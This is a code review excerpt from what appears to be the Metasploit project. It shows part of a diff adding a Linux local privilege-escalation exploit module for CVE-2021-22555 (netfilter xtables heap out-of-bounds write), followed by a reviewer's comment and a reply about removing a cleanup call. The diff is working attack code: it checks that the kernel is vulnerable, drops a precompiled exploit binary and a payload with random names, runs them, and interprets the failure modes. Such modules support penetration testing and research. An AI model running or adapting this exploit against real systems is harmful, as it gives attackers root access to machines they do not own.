modules/exploits/linux/local/netfilter_xtables_heap_oob_write_priv_esc.rb

```diff
@@ -0,0 +1,155 @@
+    ubuntu_kernels = ubuntu_offsets.scan(/"(.+?)"/).flatten
+    return CheckCode::Safe("Ubuntu kernel #{version} is not vulnerable.") if !ubuntu_kernels.include? version
+
+    # Setting the MSGMNI to a lower value is an easy remedy for this exploit on vulnerable kernels.
+    # Currently, the exploit uses #define NUM_MSQIDS 4096, which is the minimum allowed message queue length.
+    minimum_msgmni = 4096
+    msgmni_path = '/proc/sys/kernel/msgmni'
+    return CheckCode::Safe("#{msgmni_path} is not readable.") if !readable?(msgmni_path)
+
+    msgmni = read_file(msgmni_path).to_i
+    if msgmni >= minimum_msgmni
+      return CheckCode::Appears("Target is running kernel release #{release}.")
+    else
+      return CheckCode::Safe("The kernel's MSGMNI queue size of #{msgmni} is too small for the exploit to execute successfully, making the target invulnerable. A minimum queue size of #{minimum_msgmni} is required. This setting can only be changed using sudo on the victim machine.")
+    end
+  end
+
+  def upload_exploit_binary
+    executable_name = rand_text_alphanumeric(5..10)
+    @executable_path = "#{base_dir}/#{executable_name}"
+    upload_and_chmodx(@executable_path, exploit_data('CVE-2021-22555', 'ubuntu.elf'))
+    register_file_for_cleanup(@executable_path)
+  end
+
+  def upload_payload_binary
+    payload_name = rand_text_alphanumeric(5..10)
+    @payload_path = "#{base_dir}/#{payload_name}"
+    upload_and_chmodx(@payload_path, generate_payload_exe)
+    register_file_for_cleanup(@payload_path)
+  end
+
+  def run_payload
+    response = cmd_exec(@executable_path, @payload_path, cmd_timeout)
+    vprint_status(response)
+    if response =~ /No space left on device/
+      # After too many failed attempts, the system needs to be restarted.
+      fail_with(Failure::PayloadFailed, 'The exploit failed! To try again, the remote system needs to be restarted as the memory has been corrupted.')
+    elsif response =~ /Error could not corrupt any primary message/ || response =~ /Error could not leak adjacent secondary message/
+      fail_with(Failure::PayloadFailed, 'The exploit failed when trying to corrupt the message queue. You can try running the exploit again.')
+    elsif response =~ /system is not using an Ubuntu kernel/
+      fail_with(Failure::PayloadFailed, 'The target is not running an Ubuntu kernel.')
+    elsif response =~ /not recognized/
+      fail_with(Failure::PayloadFailed, 'The target is running a kernel version that is currently not supported by the exploit.')
+    end
+    print_status('Payload executed!')
+  end
+
+  def exploit
+    fail_with(Failure::BadConfig, "#{base_dir} is not writable.") if !writable?(base_dir)
+
+    print_status('Dropping pre-compiled binaries to system...')
+    upload_exploit_binary
+    print_status('Uploading payload...')
+    upload_payload_binary
+    print_status('Running payload on remote system...')
+    run_payload
+    cleanup
```

Comment:
Either we need to delete this line as metasploit framework will handle calling cleanup for us automagically, or we'll need to wrap it in an `ensure`

```suggestion
ensure
    cleanup
```

Reply:
After some more testing, `cleanup` here is unnecessary. The files get removed when the exploit fails, and when it succeeds so no files are left behind either way 👍